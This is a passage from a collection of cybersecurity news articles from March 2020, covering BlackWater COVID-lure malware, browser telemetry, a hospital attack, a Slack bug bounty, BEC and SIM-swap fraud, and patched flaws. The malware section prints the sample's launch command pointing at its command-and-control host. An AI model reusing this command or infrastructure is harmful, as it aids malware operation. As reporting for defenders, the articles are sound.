Inside this RAR file is a file called "Important - COVID-19.docx.exe" that uses a Word icon. Unfortunately, as Microsoft hides file extensions by default, many will simply see this file as a Word document rather than an executable and be more likely to open it.

Extracted file with extensions off and on
Extracted file with extensions off and on
When opened, the malware will extract a Word document to the %UserProfile%\downloads folder called "Important - COVID-19.docx.docx" and opens it in Word.

The opened document is a document containing information on the COVID-19 virus and is being used by the malware as a decoy as it installs the rest of the malware and executes it on the computer.

Decoy COVID-19 Information Document
Decoy COVID-19 Information Document
While victims are reading the COVID-19 document, the malware is also extracting the %UserProfile%\AppData\Local\Library SQL\bin\version 5.0\sqltuner.exe file.

This is where things get a bit interesting as the malware is then launched using a command line that causes the BlackWater malware to connect to a Cloudflare Worker that acts as a command and control server or at least a passthrough to one.

sqltuner.exe lively-dream-c871.m7.workers.dev
If visiting this site directly, users will be shown the following 'HellCat' image.

Cloudflare worker
Cloudflare worker
Head of SentinelLabs Vitali Kremez told BleepingComputer that this worker is a front end to a ReactJS Strapi App that acts as a command and control server.

Kremez stated that this C2 will respond with a JSON encoded string that may contain commands to execute when the malware connects to it with the right authentication parameters.

The BlackWater malware is, by and large, a newer generation malware taking advantage of the ReactJS Strapi App for the backend checking, leveraging Cloudflare workers resolvers and employing JSON-based parser inside its DLL passing the server argument directly. The check-ins bear the "blackwater" marker as well passing either email @ black.water or @ black64.water depending on the architecture.

The malware appears to be novel and its JSON-based parser with the newer generation ReactJS backend server architecture is indicative of the active development amid the CoronaVirus outbreak.

When we asked why they were using a Cloudflare Worker rather than connecting directly to the C2, Kremez felt it was to make it harder to for security software to block IP traffic without blocking all of Cloudflare's Worker infrastructure.

"I think this is why they employ as it returns back the legit Cloudflare proxy IP which acts as a reverse proxy passing the traffic to the C2. It makes blocking the IP traffic impossible given it is Cloudflare (unless the whole Cloudflare worker space is banned) infrastructure while hiding the actual C2."

While there is still plenty to learn about this new malware and how it operates, it does provide an interesting glimpse of how malware developers are utilizing legitimate cloud infrastructure in novel ways.

Using Cloud Workers, traffic to malware command & control servers become harder to block and the malware operation can be easily scaled as needed.


Research Finds Microsoft Edge Has Privacy-Invading Telemetry
15.3.2020 
Bleepingcomputer  OS  Privacy

While Microsoft Edge shares the same source code as the popular Chrome browser, it offers better privacy control for users. New research, though, indicates that it may have more privacy-invading telemetry than other browsers.

According to Microsoft, telemetry refers to the system data that is uploaded by the Telemetry components or browser's built-in services. Telemetry features aren't new to Microsoft and the company has been using Telemetry data from Windows 10 to identify issues, analyze and fix problems.

Professor Douglas J Leith, Chair of Computer Systems at Trinity College in Ireland, tested six web browsers to determine what data they were sharing. In his research, he pitted Chromium-based Microsoft Edge, Google Chrome, Brave, Russia's Yandex, Firefox and Apple Safari.

Unfortunately, Microsoft Edge didn't perform well in various privacy tests.

Too much telemetry in Microsoft Edge
When testing the Edge Browser, Leith saw that every URL that was typed into Edge would be sent back to Microsoft sites.

For example, every URL typed into the address bar is shared with Bing and other Microsoft services such as SmartScreen. This was confirmed by BleepingComputer who used Fiddler to see the JSON data being sent to Microsoft.

Unhashed URL being sent to SmartScreen
Unhashed URL being sent to SmartScreen
This could be fixed by using a technique similar to Google's Safe Browsing implementation that downloads a a list of known malicious sites and saves it locally. This list is the checked by the browser and if any data needs to be sent to Google's servers, will only send a hashed partial URL fingerprint that can be used to track browsing behavior.

The browser also sends unique hardware identifiers to Microsoft, which is a "strong and enduring identifier" that cannot be easily changed or deleted.

User tracking information being sent
User tracking information being sent
Russian web browser Yandex is also engaged in similar anti-privacy activities:

From a privacy perspective Microsoft Edge and Yandex are qualitatively different from the other browsers studied. Both send persistent identifiers than can be used to link requests (and associated IP address/location) to back end servers. Edge also sends the hardware UUID of the device to Microsoft and Yandex similarly transmits a hashed hardware identifier to back end servers. As far as we can tell this behaviour cannot be disabled by users. In addition to the search autocomplete functionality that shares details of web pages visited, both transmit web page information to servers that appear unrelated to search autocomplete.

It's important to note that Microsoft Edge for Enterprise gives administrators a lot of control in deployments to disable all these trackers, but the trackers are enabled by default in all Edge installations.

While Microsoft Edge didn't fare well in the tests, the researcher has also questioned Chrome's and other browser's behaviour.

Users have previously noticed that Chrome scans the entire computer and reports hashes of executable programs back to Google to build Chrome's Safe Browsing platform.

Chrome, Firefox and Safari share details of every webpage you visit with their services. All these browsers use autocomplete feature to send web addresses to their services in realtime.

Firefox's telemetry transmissions, which is silently enabled by default, can potentially be used to link these over time. In Firefox, there is also an open WebSocket for push notifications and it is linked to a unique identifier, which could be used for tracking, according to the researcher.


COVID-19 Testing Center Hit By Cyberattack
15.3.2020 
Bleepingcomputer  Attack

Hospitals around the world struggle with ever-growing waves of COVID-19 infections but the efforts in one testing center in Europe are being hampered by cybercriminal activity.

Computer systems at the University Hospital Brno in the Czech Republic have been shut down on Friday due to a cyberattack that struck in the wee hours of the day.

This comes at a time when there are more than 140 confirmed infections in the country and around 4,800 people in quarantine. The government has declared a state of emergency and imposed stern restrictions on crossing the border.

The University Hospital Brno hosts one of the 18 laboratories the Czech Republic uses for testing for the new coronavirus. Since the outbreak, the institution did up to 20 tests a day.

Not all systems are down
Little information has been released about the attack, which occurred on Friday morning, around 2 a.m. local time. Its nature remains unknown but it would not be a surprise if it were a ransomware incident. At the time of writing, the hospital's website was down.

Due to the attack, the results for COVID-19 tests in the past couple of days, estimated to dozens, have been delayed. It typically takes a day to get the results.

According to the Czech News Agency (ÈTK), the director of the hospital, Jaroslav Štìrba, told reporters that computer systems started "falling gradually" and "had to be shut down." Members of the staff received instructions not to turn on the computers.

Systems serving laboratories like hematology, microbiology, biochemistry, tumor diagnostics, or radiology appear to be on a different network than the affected systems as they continue to work.

Basic operations are still possible at the hospital and patients are still being investigated, despite the attack. However, medical data collected by lab systems is stuck there and cannot be recorded in databases.

Recipes are written by hand or typed, leading to longer examination times. This happens at a point when every minute counts and doctors need all the help in dealing with COVID-19 infections.

The National Cyber and Information Security Agency (NÚKIB) has been called in and is working to identify the root of the problem and remedy the situation. The National Organized Crime Center is also involved in the case.

Because the state of emergency had already been declared in the country when the attack occurred, the investigators will treat it with priority and aggravated circumstances will be considered for prosecution.

Malware in the time of COVID-19
Some ransomware operators, like Maze, intentionally avoid targeting critical services. They told BleepingComputer that they "don’t attack hospitals, cancer centers, maternity hospitals and other socially vital objects."

Other ransomware actors, though, have no problem attacking healthcare units. At the beginning of 2018, SamSam hit at least two hospitals in the U.S.

Ryuk also has no remorse attacking hospitals. Last year, DCH hospitals in Alabama paid what the cybercriminals demanded for the decryption key that unlocked the medical data.

Other threat actors are also trying to capitalize from this global health crisis and created malware or launched attacks with a COVID-19 theme. A new ransomware strain discovered this week, BEC scammers are using the outbreak in an attempt to persuade victims to send money to a different account.

DomainTools also found a new malware for Android phones that locks them up and demands a ransom of $100 in bitcoin. CovidLock, as the researchers named it, locks the phone screen and threatens to delete contacts, pictures, and videos. The ransom note also claims to leak social media accounts to the public.

This is a screen-locker and starting Android 7.0 (Nougat) there is protection against it if a password is already set. CovidLock can still affect devices where unlocking the screen is not password protected.

DomainTools have obtained the decryption key for the unlock password set by CovidLocker and will soon make it public, along with the technical details of their research.


Slack Bug Allowed Automating Account Takeover Attacks
15.3.2020 
Bleepingcomputer  Vulnerebility

Slack has fixed a security flaw that allowed hackers to automate the takeover of arbitrary accounts after stealing session cookies using an HTTP Request Smuggling CL.TE hijack attack on https://slackb.com/.

Web security researcher and bug bounty hunter Evan Custodio reported the bug to the team collaboration platform's security team via Slack's HackerOne bug bounty program on November 14th.

The researcher discovered the vulnerability after targeting several HTTP Request Smuggling (1, 2) exploits on Slack in-scope assets using tooling he developed.

Slack fixed the bug within 24 hours according to the bug report's timeline and rewarded Custodio with a $6,500 bounty, with the report being publicly disclosed just two days ago.

Bug could have lead to a massive data breach
Custodio says that the bug was "extremely critical" for both Slack and all the platform's customers and organizations that share private data, channels, and conversations on Slack as it "could lead to a massive data breach of a majority of customer data."

Using an attack targeting this bug would have allowed malicious actors to create automated bots that could attack the vulnerable in-scope Slack asset continuously, jump onto a victim's session, and steal all reachable data.

As Custodio further explained in his detailed write-up, the bug chain that allowed him to steal sessions cookies included multiple steps.

HTTP Request Smuggling CLTE AttackGaining access to the session cookies
Gaining access to the session cookies
The researcher "exploited an HTTP Request Smuggling bug on a Slack asset to perform a CL.TE-based hijack onto neighboring customer requests," the bug report reads.

"This hijack forced the victim into an open-redirect that forwarded the victim onto the researcher's collaborator client with slack domain cookies.

"The posted cookies in the customer request on the collaborator client contained the customer's secret session cookie. With this attack, the researcher was able to prove session takeover against arbitrary slack customers."

Once the cookies got stolen, attackers would only have to plug the cookies into a browser and gain full control of the account, being able to collect and exfiltrate all the data.

So I did promise blog posts on RS CLTE-style attacks, I guess this will have to do for now. Often times with RS hijacking you can throw a victim into an open redirect to steal their tokens/cookies. Many thanks to @SlackHQ for fixing this within 24-hours of discovery #bugbounty https://t.co/EUm6pNgjlF

— Evan Custodio (@defparam) March 12, 2020
Slack fixed another bug — within five hours from disclosure — that would have allowed attackers to steal a user's authentication token that could then provide full control over their messages and account.

That security flaw was reported by Detectify security researcher Frans Rosén three years ago, in March 2017, and it allowed attackers to set up malicious sites for stealing XOXS tokens.

The bug's disclosure earned Rosén $3,000, Slack confirmed that they "resolved the postMessage and call-popup redirect issues, and performed a thorough investigation to confirm that this had never been exploited."


Google Is Not Creating a Nationwide Coronavirus Info Site
15.3.2020 
Bleepingcomputer  IT

In a press conference in the White House Rose Garden, President Trump announced that Google and 1,700 of its engineers are working on a new web site devoted to information about Coronavirus.

President Trump and Vice President Pence stated that this site would allow people to enter their symptoms and determine if a test was needed. If a test is recommended, the site would then direct them to the nearest location that is offering Coronavirus tests.

To help facilitate the testing for Coronavirus, Walmart, CVS, Target, and Walgreens have announced that they will be volunteering a portion of their parking lots to be set up as drive-through Coronavirus testing sites.

These locations would allow people to drive up and receive a test without having to leave their car.

Vice President Pence said that more information about the availability of Google's site will be ready this weekend.

"By this Sunday evening, we will be able to give specific guidance on when the web site will be available. You can go to the web site, as the President said, you type in your symptoms and be given direction whether or not a test is indicated. And then at the same web site, you will be directed to one of these incredible companies that are gonna give a little bit of their parking lot so that people can come by and be given a drive-by test," Vice President Pence stated.

Soon after this press conference, the Google Communications Twitter account stated that another Alphabet company named Verily is in the early stages of creating a tool for testing in the San Francisco Bay area, with possible expansion at a later date.

Google Tweet

This tool, though, is not being designed for nationwide access and it not ready as of yet.

This press conference can be seen below.

Update 3/14/20: This story has been updated to reflect Google's statement that they are not creating a nationwide web site.


Ancient Tortoise BEC Scammers Launch Coronavirus-Themed Attack
15.3.2020 
Bleepingcomputer  Spam

A Business Email Compromise (BEC) cybercrime group has started using coronavirus-themed scam emails that advantage of the COVID-19 global outbreak to convince potential victims to send payments to attacker-controlled accounts.

In a report shared with BleepingComputer, Agari Cyber Intelligence Division (ACID) researchers say that they "believe this attack is the first reported example of BEC (business email compromise) actors exploiting the global COVID-19 event."

This scammer group tracked by Agari researchers as Ancient Tortoise is known for actively using financial aging reports in BEC attacks.

Aging reports (also known as a schedule of accounts receivable) are sets of outstanding invoices that help a company's financial department to track customers who haven't paid goods or services bought on credit.

Ancient Tortoise gains the trust of employees by asking for aging reports while impersonating a company's executives and then asking the customers to pay the outstanding invoices listed in the aging report.

Coronavirus-powered BEC scam
Yesterday, as part of an ongoing BEC scam investigation and multiple email exchanges with Ancient Tortoise actors, Agari researchers received a coronavirus-themed scam email that instructed the personas (aka unpaying customers listed on a face aging report) used as part of the research to pay an overdue invoice using a different bank account.

"Due to the news of the Corona-virus disease (COVID-19) we are changing banks and sending payments directly to our factory for payments, so please let me know total payment ready to be made so i can forward you our updated payment information," the scam email reads.

Agari's researchers received a Hong Kong mule account where the money should be sent once the scammers were told that the payment will be wired as soon as possible.

It took about three weeks for the attackers to send the coronavirus-themed scam email after their initial contact with the researchers, between February 17th when the request for an aging report landed in Agari's inboxes and March 9th when they launched the final attack on the fake vendor.

Until now, although threat actors have been sending coronavirus-themed spam emails to targets since January, most were sent as part of spam campaigns used to deliver malware payloads and to phish for credentials.

Coronavirus-themed scam email
Coronavirus-themed scam email (Agari)
Several BEC groups are using aging report in attacks
Ancient Tortoise is just one of the BEC scammer groups tracked by Agari, with Silent Starling, Curious Orca, and Scattered Canary being other actors known for running elaborate BEC schemes leading to the compromise of hundreds of employees from companies from all over the world.

"In one case, Silent Starling received a consolidated aging report that included details for more than 3,500 customers with past due payments totaling more than $6.5 million," Agari said.

To defend against BEC attacks, Agari recommends vendors and suppliers who are initially targeted via executive impersonation attacks to implement strong email authentication and anti-phishing email protections focused on defending against advanced identity deception attacks and brand spoofing.

Companies working with external suppliers are advised to also set up a formal process for handling outgoing payments when suppliers are changing the normal payment account to efficiently prevent such attacks.

BEC scams behind $1.8 billion in losses in 2019
FBI's Internet Crime Complaint Center (IC3) 2019 Internet Crime Report published in February says that BEC was the cybercrime type with the highest reported total victim losses last year as it reached almost $1.8 billion in losses following attacks that targeted wire transfer payments of individuals and businesses.

IC3 also observed an increased number of diversion of payroll funds BEC complaints where fraudsters change employees' direct deposit information by tricking their company's human resources or payroll departments.

The FBI also warned private industry partners in early March that threat actors are abusing Microsoft Office 365 and Google G Suite as part of BEC attacks.

"Between January 2014 and October 2019, the Internet Crime Complaint Center (IC3) received complaints totaling over $2.1 billion in actual losses from BEC scams targeting Microsoft Office 365 and Google G Suite," the FBI said in a Private Industry Notification (PIN) from March 3.


US Govt Shares Tips on Securing VPNs Used by Remote Workers
15.3.2020 
Bleepingcomputer  BigBrothers

The Department of Homeland Security's cybersecurity agency today shared tips on how to properly secure enterprise virtual private networks (VPNs) seeing that a lot of organizations have made working from home the default for their employees in response to the Coronavirus disease (COVID-19) pandemic.

"As organizations elect to implement telework, the Cybersecurity and Infrastructure Security Agency (CISA) encourages organizations to adopt a heightened state of cybersecurity," an alert published today says.

Malicious actors expected to focus attacks on teleworkers
Since more and more employees have switched to using their org's VPNs for teleworking, threat actors will increasingly focus their attacks on VPN security flaws that will be less likely to get patched in time if work schedules will be spread around the clock.

CISA also highlights the fact that malicious actors might also increase their phishing attacks to steal the user credentials of employees working from home, with orgs that haven't yet implemented multi-factor authentication (MFA) for remote access being the most exposed.

Is your organization teleworking because of #COVID19? Here are some https://t.co/tcA8Kr6DTq key recommendations on enterprise VPN security. #CyberVigilance #Cyber Cybersecurity #Infosec

— US-CERT (@USCERT_gov) March 13, 2020
"Organizations may have a limited number of VPN connections, after which point no other employee can telework," CISA adds.

"With decreased availability, critical business operations may suffer, including IT security personnel’s ability to perform cybersecurity tasks."

Mitigations for boosting enterprise VPN security
Among the mitigation measures recommended for organizations considering telework options for their employees because of the Coronavirus disease (COVID-19) pandemic, CISA lists:

• Keeping VPNs, network infrastructure devices, and devices used for remote work up to date (apply the latest patches and security configs).
• Notifying employees of an expected increase in phishing attempts.
• Ensuring that IT security staff are ready for remote log review, attack detection, and incident response and recovery.
• Implementing MFA on all VPN connections or required employees to use strong passwords to defend against future attacks.
• Testing VPN infrastructure limitations in preparation for mass usage and take measures such as rate-limiting to prioritize users that will require higher bandwidths.

As part of its teleworking guidance, CISA also advises organizations to review DHS documentation on how to secure network infrastructure devices, avoid social engineering and phishing attacks, choose and protect passwords and supplement passwords, as well as the National Institute of Standards and Technology (NIST) guide to enterprise telework and BYOD security

The DHS cybersecurity agency previously warned orgs to patch Pulse Secure VPN servers against ongoing attacks trying to exploit a known remote code execution (RCE) vulnerability tracked as CVE-2019-11510.

One week later, the FBI said in a flash security alert that state-backed hackers have breached the networks of a US financial entity and a US municipal government after exploiting servers left vulnerable to CVE-2019-11510 exploits.

Unpatched Pulse Secure VPN servers remain an attractive target for malicious actors. @CISAgov released an Alert on continued exploitation of CVE-2019-11510 in Pulse Secure. Update ASAP! https://t.co/n7mx9juifv #Cyber #Cybersecurity #InfoSec

— US-CERT (@USCERT_gov) January 10, 2020
CISA also published information on how to defend against scammers who use the Coronavirus Disease 2019 (COVID-19) health crisis as bait to push their scams over the Internet.

The World Health Organization (WHO) and the U.S. Federal Trade Commission (FTC) issued warnings about ongoing Coronavirus-themed phishing attacks and scam campaigns in February.

Microsoft, Google, LogMeIn, and Cisco have also announced last week that they are offering free licenses for their meeting, collaboration, and remote work tools so that teleworkers can join virtual meetings and chat with colleagues while working remotely.


Microsoft Unveils New Windows 10 Automatic Driver Update Plan
15.3.2020 
Bleepingcomputer  OS

Microsoft has unveiled a new plan for the delivery of automatic driver updates that they hope will reduce the number of reliability issues users experience in Windows 10.

When a hardware driver is marked as automatic, Microsoft will automatically download and install the driver in Windows 10.

Marking drivers as automatic
Marking drivers as automatic
Pushing out a new driver to a large Windows 10 population, though, can cause reliability issues, hardware conflicts, or bugs to appear as they begin to be used within a much larger user base.

To resolve these types of issues, this month Microsoft will use a new automatic driver update plan that performs gradual rollouts of new drivers to a small group of programmatically chosen users before slowly releasing the driver to the rest of the Windows 10 population.

This initial population will be made up of Windows 10 devices that are highly active so that there is a higher chance that Microsoft will receive diagnostic data about the quality of the driver and if it is causing any issues.

"The initial set is programmatically selected and is typically both highly active and representative of targeted clusters of hardware ID (HWID) and computer hardware ID (CHID) combinations for the particular driver. The initial rollout targets highly active devices as there is a higher chance of getting diagnostic data from these devices, which enables early failure detection," Microsoft explains.

Microsoft says this initial rollout stage will take approximately 8 days and the rest of the rollout can continue up to 30 days as they gradually increase its availability and the collection of diagnostic data.

This timeframe, though, can vary between drivers depending on whether the drivers has been assessed as a low or high-risk driver as seen by the graph below.

Gradual Rollout Graph
Gradual Rollout Graph
Once satisfactory data has been analyzed and determined to meet the required thresholds for what is considered a successful rollout, the driver will be made available to 100% of the users for install via Windows Update.


Europol Dismantles SIM Swap Criminal Groups That Stole Millions
15.3.2020 
Bleepingcomputer  CyberCrime  Mobil 

Europol arrested suspects part of two SIM swapping criminal groups in collaboration with local law enforcement agencies from Spain, Austria, and Romania following two recent investigations.

SIM swap fraud (also known as SIM hijacking) happens when a scammer takes control over a target's phone number via social engineering or by bribing mobile phone operator employees to port the number to a SIM controlled by the fraudster.

Subsequently, the attacker will receive all messages and calls delivered to the victim onto his own phone, thus being able to bypass SMS-based multi-factor authentication (MFA) by gaining access to one-time password (OTP) codes, to steal credentials, and to take control of online service accounts.

Successful SIM hijacking attacks allow criminals to log in to their victims' bank accounts and steal money, take over their email or social media accounts, as well as change account passwords and locking victims out of their accounts.

"Fraudsters are always coming up with new ways to steal money from the accounts of unsuspecting victims," acting Head of Europol’s European Cybercrime Centre Fernando Ruiz said.

"Although seemingly innocuous, SIM swapping robs victims of more than just their phones: SIM hijackers can empty your bank account in a matter of hours," he added. "Law enforcement is gearing up against this threat, with coordinated actions happening across Europe."

Millions of euros stolen from victims
12 individuals suspected to be part of a hacking ring which was able to steal more than €3 million in several SIM swapping attacks were arrested in Spain by the Spanish National Police (Policía Nacional) in collaboration with Europol and the Civil Guard (Guardia Civil), during 'Operation Quinientos Dusim.'

"Composed of nationals between the ages of 22-52 years old from Italy, Romania, Colombia and Spain, this criminal gang struck over 100 times, stealing between €6,000 and €137,000 from bank accounts of unsuspecting victims per attack," Europol said.

"The criminals managed the obtain the online banking credentials from the victims of the different banks by means of hacking techniques such as the use of banking Trojans or other types of malware. Once they had these credentials, the suspects would apply for a duplicate of the SIM cards of the victims, providing fake documents to the mobile service providers.

"With these duplicates in their possession, they would receive directly to their phones the second-factor authentication codes the banks would send to confirm transfers."

As Europol explains, once they gained access to their victims' bank accounts, the suspects made transfers to mule accounts within a time frame of two hours so that their victims weren't able to realize that something was wrong with their phones.

SIM swapping
Image: Europol
Another 14 members of a SIM hijacking gang were also arrested as part of 'Operation Smart Cash' following an investigation led by the Romanian National Police (Poliția Românã) and the Austrian Criminal Intelligence Service (Bundeskriminalamt), in collaboration with the Europol.

"The thefts, which netted dozens of victims in Austria, were perpetrated by the gang in the spring of 2019 in a series of SIM swapping attacks," Europol said.

"Once having gained control over a victim’s phone number, this particular gang would then use stolen banking credentials to log onto a mobile banking application to generate a withdraw transaction which they then validated with a one-time password sent by the bank via SMS allowing them to withdraw money at cardless ATMs."

This crime group was able to steal more than €500,000 from dozens of Austrian during the spring of 2019 and until they were arrested at their homes in Romania during early February.

Defending against SIM swapping attacks
Europol also shared measures you can take if you want to prevent SIM hijackers from stealing your credentials and locking out of your accounts.

To make sure that SIM swapping doesn't affect you, Europol recommends the following:

• Keep your devices’ software up to date
• Do not click on links or download attachments that come with unexpected emails
• Do not reply to suspicious emails or engage over the phone with callers that request your personal information
• Limit the amount of personal data you share online
• Try to use two-factor authentication for your online services, rather than having an authentication code sent over SMS
• When possible, do not associate your phone number with sensitive online accounts
• Set up your own PIN to restrict access to the SIM card. Do not share this PIN with anyone.

If you lose mobile connectivity where you normally have no issues, you should immediately contact your provider and the bank if you spot any suspicious activity on your bank account.

Depending on what your mobile provider says, you might have to quickly change passwords for your online accounts to avoid further compromise in case scammers got your SIM ported to an attacker-controlled device.

The Federal Bureau of Investigation (FBI) also issued a SIM swapping alert last year with guidance on defending against such attacks after observing an increase in the number of SIM jacking attacks.

The FTC provides detailed info on how to secure personal information on your phone and on how to keep personal information secure online.


VMWare Releases Fix for Critical Guest-to-Host Vulnerability
15.3.2020 
Bleepingcomputer  Vulnerebility

A security update has been released that fixes a Critical vulnerability in VMware Workstation Pro that could allow an application running in a guest environment to execute a command on the host.

This vulnerability is in the Windows vmnetdhcp service, which is used to assign IP addresses to the guest host via DHCP.

According to a VMware advisory, this vulnerability could allow attackers to perform a denial-of-service attack or execute commands on the Windows host.

"Successful exploitation of this issue may lead to code execution on the host from the guest or may allow attackers to create a denial-of-service condition of the vmnetdhcp service running on the host machine."

This could allow a malicious program, such as malware, to utilize the vulnerability to escape from the guest and take full control over the host PC.

While no known vulnerability exists at this point, as shown by Microsoft's recent SMBv3 vulnerability, researchers and attackers are known to quickly analyze and create proof-of-concept exploits once a vulnerability is announced.

Due to the critical nature of this vulnerability, it is strongly advised that users upgrade VMware Workstation as soon as possible.

The list of affected products are:

VMware Workstation Pro / Player (Workstation)
VMware Fusion Pro / Fusion (Fusion)
VMware Horizon Client for Windows
VMware Remote Console for Windows (VMRC for Windows)
To resolve this vulnerability, VMware Workstation users should upgrade to version 15.5.2.


PornHub Helps Italians Stay Indoors with Free Premium Access
15.3.2020 
Bleepingcomputer  IT

To help ease the boredom and isolation caused by a country-wide coronavirus lockdown in Italy, PorbHub is offering a helping hand by providing Italians free access to their premium service.

On March 10th, 2020, Italy began a nationwide Coronavirus lockdown to help prevent the community spread of the virus. As part of this lockdown, Italians are requested to stay indoors, a 6 PM curfew is being enforced, and people should only travel if necessary.

To offer some entertainment for those stuck indoors, PornHub has announced that they are donating their March proceeds from ModelHub to Italy and that Italians can get free Premium access through March.

"Pornhub is donating its March proceeds from Modelhub to support Italy during this unfortunate time (model earnings will remain untouched). Italy will also have free access to Pornhub Premium throughout the month. Forza Italia, we love you! heart"

Users in Italy can sign up for free premium access through by going to pornhub.com/free-italy.

Free PornHub Premium offer to Italy
Free PornHub Premium offer to Italy
Unfortunately, this outbreak will most likely last far longer than March and with Italy getting hit so hard with this virus, it is hoped that PornHub and other streaming services will continue to offer free services to the country.


WordPress Plugin Bug Allows Malicious Code Injection on 100K Sites
15.3.2020 
Bleepingcomputer  Virus

Vulnerabilities in the Popup Builder WordPress plugin could allow unauthenticated attackers to inject malicious JavaScript code into popups displayed on tens of thousands of websites, to steal information, and to potentially fully take over targeted sites.

Popup Builder enables site owners to create, deploy, and manage customizable popups containing a wide range of content from HTML and JavaScript code to images and videos.

Sygnoos, the plugin's developer, markets it as a tool that can help increase sales and revenue via smart pop-ups used to display ads, subscription requests, discounts, and various other types of promotional content.

Unauthenticated XSS and information disclosure flaws
The security flaws discovered by Defiant QA Engineer Ram Gall affect all versions up to and including Popup Builder 3.63.

"One vulnerability allowed an unauthenticated attacker to inject malicious JavaScript into any published popup, which would then be executed whenever the popup loaded," Gall said.

"Typically, attackers use a vulnerability like this to redirect site visitors to malvertising sites or steal sensitive information from their browsers, though it could also be used for site takeover if an administrator visited or previewed a page containing the infected popup while logged in."

The other bug made it possible for any logged-in user (with permissions as low as a subscriber) to gain access to plugin features, to export newsletter subscribers lists, as well as to export system configuration info with a simple POST request to admin-post.php.

No nonce and permission checks in vulnerable code
No nonce and permission checks in vulnerable code (Defiant)
Vulnerabilities patched, tens of thousands still exposed
The flaws tracked as CVE-2020-10196 and CVE-2020-10195 allow for unauthenticated stored XSS, configuration disclosure, user data export, and website settings modification.

Sygnoos fixed the security issues with the release of Popup Builder version 3.64.1, one week after Defiant reported the bugs.

Since the fixed Popup Builder release was published, just over 33,000 users have updated the plugin, which still leaves over 66,000 sites with active installation exposed to attacks.

"While we have not detected any malicious activity targeting Popup Builder, the stored XSS vulnerability can have a serious impact on site visitors and potentially even allow site takeover," Gall added.

Since late February, hackers are actively trying to take over WordPress sites by exploiting plugin vulnerabilities allowing them to plant backdoors and to create rogue administrator​​​ accounts, with hundreds of thousands of website sites being exposed to attacks.


Open Exchange Rates Data Breach Affects Users of Well-Known Orgs
15.3.2020 
Bleepingcomputer  Incindent

Open Exchange Rates has announced a data breach that exposed the personal information and salted and hashed passwords for customers of its API service.

Open Exchange Rates provides an API that allows organizations to query real-time and historical exchange rates for over 200 world currencies. The service's web site states that their API is used by companies such as Etsy, Shopify, Coinbase, Kickstarter, and more.

In data breach notification emails sent today, Open Exchange Rates explains that while investigating a network misconfiguration that was causing delays in their service, they discovered that an unauthorized user had gained access to their network and a database that included user information.

Open Exchange Rates Data Breach Notification
Open Exchange Rates Data Breach Notification
Source: Twitter
After further investigations, it was discovered that the hacker had access to their system for almost a month between February 9th, 2020, and March 2nd, 2020 and that the data was most likely extracted from their systems.

"Upon further examination, we determined that the unauthorised user appeared to have initially gained access on 9 February 2020, and could have gained access to a database in which we store user data. Whilst our investigations are ongoing, we have also found evidence indicating that information contained in this database is likely to have been extracted from our network." the email stated.

The following user information was exposed by this data breach:

The name and email address you registered with;
An encrypted/hashed password used by you to access your account connected with the platform;
IP addresses from which you have registered and/or logged into your account with us;
App IDs (32-character strings used to make requests to our service) associated with your account;
Personal and/or business name and address (if you have provided these);
Country of residence (if provided);
Website address (if provided).
Due to this breach, Open Exchange Rates has disabled the password for all accounts created before March 2nd, 2020 and users should use this link to set a new password.

If the same password is used at other sites, BleepingComputer strongly recommends that the password be changed at those sites as well.

As the customer API keys for the service may have also been exposed, Open Exchange Rates is recommending that all users generate new API IDs to access the service.

"As the App IDs (API keys) connected to your account are also potentially affected, you may also wish to generate new ones to access the service via your account dashboard. We do not have any evidence of these being used to gain access to the API, however they could be used to query exchange rate information from our service using your account."

As this API is used by well-known organizations, Open Exchange Rates is warning that the stolen data could be used in targeted spear-phishing campaigns and users should be suspicious of any email, phone calls, or texts asking to confirm their account information.

It is also recommended that users enable two-factor authentication at all sites that they have an account.


Discord Offers Enhanced Go Live Streaming Due to Coronavirus
15.3.2020 
Bleepingcomputer  IT

Discord has increased the number of people who can join a Go Live streaming session at the same time to aid those affected by the Coronavirus (COVID-19) outbreak.

Discord offers a free private streaming and screen sharing service called Go Live that normally only allows 10 users to connect to a streaming session at once. Discord Go Live Service
Discord Go Live Service
To help those who are quarantined or just feel isolated during the virus outbreak, Discord has raised the limit of their Go Live streaming service from 10 simultaneous users to 50 users at once.

"We wanted to find a way to help, so we’re temporarily upping the limit on Go Live to 50 people at a time, up from 10. Go Live is free to use and lets people privately stream or screen share apps from a computer while others watch on any device — so teachers can conduct a class, co-workers can collaborate, and groups can still meet. You can learn more about how to get started with Go Live here," Discord stated in a blog post.

TechSmith also offering free licenses
TechSmith also announced that they are offering free licenses of their TechSmith Snagit and TechSmith Video Review software through June 30th, 2020.

"Our screen recording tool, TechSmith Snagit, and our asynchronous collaboration platform, TechSmith Video Review, will be provided for free through the end of June 2020 to any organization that needs it," TechSmith announced today.

For existing customers of the TechSmith Relay or Video Review products, TechSmith is providing free increased usage with no charge.


Office 365 ATP To Block Email Domains That Fail Authentication
15.3.2020 
Bleepingcomputer  Safety

Microsoft is working on including a new Office 365 Advanced Threat Protection (ATP) feature that would block email sender domains automatically if they fail DMARC authentication as part of an effort to make Office 365 ATP secure by default.

This change was prompted by the fact that, for some custom Office 365 ATP configurations, the default email threat-protection filters might be bypassed and malicious content could inadvertently reach customers' inboxes.

Domain-based Message Authentication, Reporting, and Conformance (DMARC) is an email authentication, policy, and reporting protocol that uses the Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) email authentication methods to validate mail senders.

As Microsoft explains, "DMARC helps receiving mail systems determine what to do with messages sent from your domain that fail SPF or DKIM checks."

Reject emails if sender domain validation fails
"We see lots of cases where configuration of our protection stack has enabled malicious content to be inadvertently delivered to end users," Microsoft explains on the new feature's Microsoft 365 Roadmap entry. "We’re working on a few features that will help address this problem."

As mentioned in the beginning, the newest Office 365 feature planned is the addition of an automated block for email domains that fail authentication.

"The Antispam policy allows administrators to 'Allow' domains regardless of the reputation of the domain," Microsoft adds. "We’re changing our policies to not honor Allow rules when the domain fails authentication."

Admins who will want to get around it can address the auth issue with the domains they want to whitelist or to add new Exchange mail flow rules (also known as transport rules) to allow messages from sender on specific domains despite the newly imposed block designed to boost email security.

At the moment, until this new Office 365 ATP feature will be rolled out sometime around April 2020, inbound email that fails DMARC are marked by Office 365 as spam instead of automatically being rejected.

Office 365 fighting attacks
Office 365 fighting attacks (Microsoft)
Part of a larger effort to secure Office 365
This feature is planned to roll out to all environments together with another one designed to also boost the default security of email inboxes protected by Office 365 ATP.

Microsoft is also planning to block malicious content in Office 365 regardless of the custom configurations unless manually overridden by admins or users. Once the new features will be enabled, Office 365 will honor EOP/ATP malware analysis (detonation) verdicts to block known malicious files and URLs automatically.

